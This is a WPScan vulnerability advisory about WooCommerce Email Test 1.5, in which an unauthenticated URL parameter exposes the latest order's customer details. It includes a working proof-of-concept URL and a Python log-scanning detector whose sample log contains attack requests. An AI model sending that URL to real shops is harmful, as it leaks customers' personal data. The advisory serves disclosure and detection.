WooCommerce Email Test 1.5 - Order Information Disclosure



Description
When this plugin is installed, any anonymous (unauthenticated) user can open this URL:

https://www.domainname.de/?woocommerce_email_test=WC_Email_Customer_Completed_Order

which renders the last (most recent) order, including all customer details, the customer's email address and the cart contents.

This is a severe security/data privacy breach and unlawful in (at least) Germany.

Proof of Concept
Replace "domainname" with a domain to be tested:

https://www.domainname.de/?woocommerce_email_test=WC_Email_Customer_Completed_Order
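Detection logic for this issue, added here as an example and not part of the advisory or of the plugin itself: it parses web server access logs in the common "combined" format, flags every request carrying the `woocommerce_email_test` parameter (percent-encoded parameter names included), and counts per client the requests answered with HTTP 200, which are the ones that most likely returned an order. The log lines and IP addresses are constructed for the example.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qs

# Query parameter the plugin (before 1.6) acted on without any authentication check.
TEST_PARAM = "woocommerce_email_test"

# Apache/nginx "combined" access-log format; trailing referer/user-agent are ignored.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Constructed sample log (not real traffic); IPs are from documentation ranges.
SAMPLE_LOG = """\
203.0.113.7 - - [08/Dec/2016:10:02:11 +0100] "GET /?woocommerce_email_test=WC_Email_Customer_Completed_Order HTTP/1.1" 200 18422 "-" "Mozilla/5.0"
203.0.113.7 - - [08/Dec/2016:10:02:15 +0100] "GET /?woocommerce_email_test=WC_Email_Customer_Completed_Order HTTP/1.1" 200 18422 "-" "Mozilla/5.0"
198.51.100.23 - - [08/Dec/2016:10:05:40 +0100] "GET /shop/ HTTP/1.1" 200 40311 "-" "Mozilla/5.0"
198.51.100.23 - - [08/Dec/2016:10:06:02 +0100] "GET /?woocommerce%5Femail_test=WC_Email_Customer_Completed_Order HTTP/1.1" 404 512 "-" "curl/7.50.1"
"""

def parse_line(line):
    """Return the matched fields as a dict (status as int), or None for unparseable lines."""
    m = LOG_RE.match(line)
    return dict(m.groupdict(), status=int(m["status"])) if m else None

def email_test_hits(lines):
    """Yield (ip, ts, status, template) for each request carrying the test parameter.
    parse_qs percent-decodes parameter names, so an encoded key still matches."""
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        query = parse_qs(urlsplit(rec["path"]).query, keep_blank_values=True)
        if TEST_PARAM in query:
            yield rec["ip"], rec["ts"], rec["status"], query[TEST_PARAM][0]

def summarize(lines):
    """Total hits plus, per client IP, the requests answered 200 (email most likely rendered)."""
    hits = list(email_test_hits(lines))
    disclosed = Counter(ip for ip, _, status, _ in hits if status == 200)
    return {"total": len(hits), "disclosed_by_ip": dict(disclosed)}

if __name__ == "__main__":
    for ip, ts, status, template in email_test_hits(SAMPLE_LOG.splitlines()):
        print(f"{ts} {ip} {status} {template}")
    print(summarize(SAMPLE_LOG.splitlines()))
```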

Affects Plugin

Fixed in version 1.6

References

URL https://plugins.trac.wordpress.org/changeset/1549532/woocommerce-email-test

Classification

Type BYPASS

Miscellaneous

Submitter jansass GmbH
Submitter Website www.jansass.com
Verified No
WPVDB ID 8689

Timeline

Publicly Published 2016-12-08
Added 2016-12-09
Last Updated 2018-09-02

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.